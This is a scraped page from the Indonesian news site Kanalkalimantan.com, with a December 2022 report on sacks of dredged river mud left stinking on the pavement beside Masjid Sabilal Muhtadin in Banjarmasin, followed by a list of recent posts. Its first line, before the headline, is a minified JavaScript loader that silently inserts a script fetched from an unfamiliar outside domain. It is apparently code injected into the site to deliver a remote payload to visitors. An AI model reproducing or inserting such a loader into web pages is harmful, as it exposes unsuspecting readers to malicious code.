(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Tumpukan Karung Isi Lumpur Dekat Masjid Sabilal Muhtadin Bikin Aroma Tak Sedap


KANALKALIMANTAN.COM, BANJARMASIN – Pemandangan tidak mengenakan terlihat di sepanjang trotoar Jalan Suprapto depan Masjid Raya Sabilal Muhtadin Banjarmasin.

Terlihat puluhan karung berwarna putih kehitaman bertumpuk sampai ke trotoar jalan sepanjang kurang lebih 50 meter di ruas utama yang biasa ramai dilalui pengendara.

Bau tidak sedap tercium pada tumpukan-tumpukan karung berwarna putih yang diketahui berisi lumpur basah tersebut.

“Saya dapat kabar, karung itu berisi lumpur hasil kerukan sungai yang ada di sungai depan Masjid Sabilal Muhtadin, tapi tumpukan karung itu belum diangkut,” ujar Thoriq Abdillah, warga Banjarmasin, Rabu (14/12/2022).

 

 

Baca juga: Bermain Senapan Berburu Ikan, Bocah 8 Tahun di Amuntai Kena Anak Panah

Menurut Thoriq tumpukan karunng isi lumpur tersebut sangat mengganggu pejalan kaki maupun pengendara yang melintas, karena tumpukan karung berisi lumpur tersebut menimbulkan bau tidak sedap.

“Ya minimal tidak berserakan di trotoar, selain menggangu jalur pejalan kaki yang melintas di situ, baunya juga menggangu,” katanya.

“Setidaknya ada upaya pihak terkait untuk mengangkut karung itu, meskipun bertahap,” tambah Thoriq.

Belakangan diketahui karung-karung yang berisi lumpur tersebut adalah hasil dari pengerukan Sungai Tatas yang dilakukan beberapa hari lalu secara manual oleh Dinas PUPR Kota Banjarmasin.

Baca juga: RESMI! Ini Hasil Undian Nomor Urut 17 Parpol Peserta Pemilu 2024

Namun, hingga Rabu sore, karung lumpur hasil kerukan tersebut belum diangku pihak penyedia jasa pengerukan sungai tersebut.

Ia berharap pihak terkait segera melakukan pengangkutan tumpukan lumpur tersebut agar pejalan kaki maupun pengendara yang lewat di sekitar Masjid Sabilal Muhtadin tersebut tidak terganggu.

“Harapannya agar pihak terkait segera mengatasinya, demi menjaga kenyamanan bersama,” tutup Thoriq. (Kanalkalimantan.com/rizki)

Reporter : rizki
Editor : bie


Risa

Recent Posts

Sekda HSU Sambut Tim Wasev TMMD ke-120

KANALKALIMANTAN.COM, AMUNTAI - Suasana hangat tampak saat Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi… Read More

12 menit ago

Seleksi Wawancara Panwascam Empat Kecamatan di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Sebanyak 14 orang calon Panitia Pengawas Kecamatan (Panwascam) di Kota Banjarbaru Kalimantan… Read More

19 menit ago

Satgas TMMD-Warga Desa Sungai Karias Keroyokan Hingga Malam

KANALKALIMANTAN.COM, AMUNTAI - Meski suasana gelap di malam hari tak menjadi penghalang anggota Satgas TNI… Read More

29 menit ago

Bangunan Liar di Atas Sungai Dibongkar Satpol PP Banjarmasin

Kabid Tibum: Bangunan Lainnya Kita Tunggu Proses Selanjutnya Read More

39 menit ago

21 Mei: Sejarah Hari Peringatan Reformasi nasional

KANALKALIMANTAN.COM - Hari Reformasi Nasional diperingati setiap 21 Mei, menjadi momen pengingat seluruh masyarakat Indonesia… Read More

6 jam ago

Syarat Dukungan Ditolak, Bakal Calon Perseorangan Pilwali Banjarmasin Ajukan Sengketa ke Bawaslu

KANALKALIMANTAN.COM, BANJARMASIN - Di awal tahapan Pemilihan Wali Kota dan Wakil Wali Kota (Pilwali) Banjarmasin… Read More

17 jam ago

This website uses cookies.